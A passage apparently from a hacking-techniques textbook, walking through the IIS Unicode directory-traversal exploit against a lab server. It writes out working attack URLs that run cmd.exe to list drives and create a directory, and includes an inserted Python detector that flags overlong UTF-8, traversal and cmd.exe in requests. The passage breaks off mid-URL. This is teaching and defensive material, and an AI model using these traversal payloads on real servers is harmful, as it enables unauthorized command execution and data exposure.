
Mark D. Spivey

"Practical Hacking Techniques and Countermeasures"

In this example, the initial discovery will show the contents of the C: drive.
To execute, right-click on a script and left-click on Copy String.
Open Internet Explorer and paste the line in the address bar. Press the
Enter key. The directory listing of the target's C: drive will appear.
The line that should be in the address bar is:
http://172.16.1.40/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
From this point the entire hard drive can be viewed a directory at a time
by editing the script in the address bar.
*Note: At this point an attacker may choose to see exactly what is installed on the
target. He or she may check to see if the target has a firewall or antivirus
installed, and whether there are any logs, proprietary software, sensitive
documents, etc.
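
Seen from the server side, a request like the one above stands out because %c0%af is an overlong UTF-8 encoding of "/". The following is an added example, not taken from the book: it percent-decodes a request URI, folds overlong 2- and 3-byte forms (a generalization beyond the single %c0%af form on this page), and flags traversal and cmd.exe in the canonical path. The function names and the sample request lines are constructed for illustration.

```python
from urllib.parse import unquote_to_bytes

def canonicalize(uri):
    """Percent-decode a URI, folding overlong 2/3-byte UTF-8; return (text, hits)."""
    raw, out, hits, i = unquote_to_bytes(uri), bytearray(), [], 0
    while i < len(raw):
        b = raw[i]
        c1, c2 = (list(raw[i + 1:i + 3]) + [0, 0])[:2]  # next two bytes, 0 if absent
        if b in (0xC0, 0xC1) and (c1 & 0xC0) == 0x80:
            # Lead bytes C0/C1 can only encode U+0000..U+007F: always overlong.
            cp, n = ((b & 0x1F) << 6) | (c1 & 0x3F), 2
        elif b == 0xE0 and 0x80 <= c1 <= 0x9F and (c2 & 0xC0) == 0x80:
            # E0 followed by 80..9F encodes a value below U+0800: overlong.
            cp, n = ((c1 & 0x3F) << 6) | (c2 & 0x3F), 3
        else:
            out.append(b)
            i += 1
            continue
        hits.append((raw[i:i + n].hex(), chr(cp)))  # record bytes and their meaning
        out += chr(cp).encode("utf-8")              # substitute the shortest form
        i += n
    return out.decode("utf-8", "replace"), hits

def inspect(uri):
    """Return the findings for one request URI (empty list means clean)."""
    text, hits = canonicalize(uri)
    path = text.split("?", 1)[0].replace("\\", "/").lower()
    findings = ["overlong-utf8"] if hits else []
    if "/../" in path or path.endswith("/.."):
        findings.append("traversal-after-decoding")
    if path.endswith("/cmd.exe"):
        findings.append("cmd.exe-in-path")
    return findings

# Constructed sample requests (method and URI only); not from a real log.
SAMPLE = [
    "GET /default.htm",
    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\",
    "GET /caf%c3%a9/menu.htm",
]

def scan(lines):
    """Return (uri, findings) for every request line that has findings."""
    uris = [line.split(" ", 1)[1] for line in lines]
    return [(u, f) for u in uris if (f := inspect(u))]

if __name__ == "__main__":
    for uri, found in scan(SAMPLE):
        print(", ".join(found), "<-", uri)
```

Legitimate multi-byte UTF-8 such as %c3%a9 passes through untouched, so only non-shortest-form encodings raise the overlong finding.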
To list the contents of the Program Files directory, edit the address bar to
http://172.16.1.40/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1
At this point an attacker may see if he or she has write access to the target.
This is done by attempting to send a create directory command within the script:
http://172.16.1.40/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+c:\beenhacked
The following screen appears:
On the address bar enter the same script originally obtained from the TCS
CGI Scanner:
http://172.

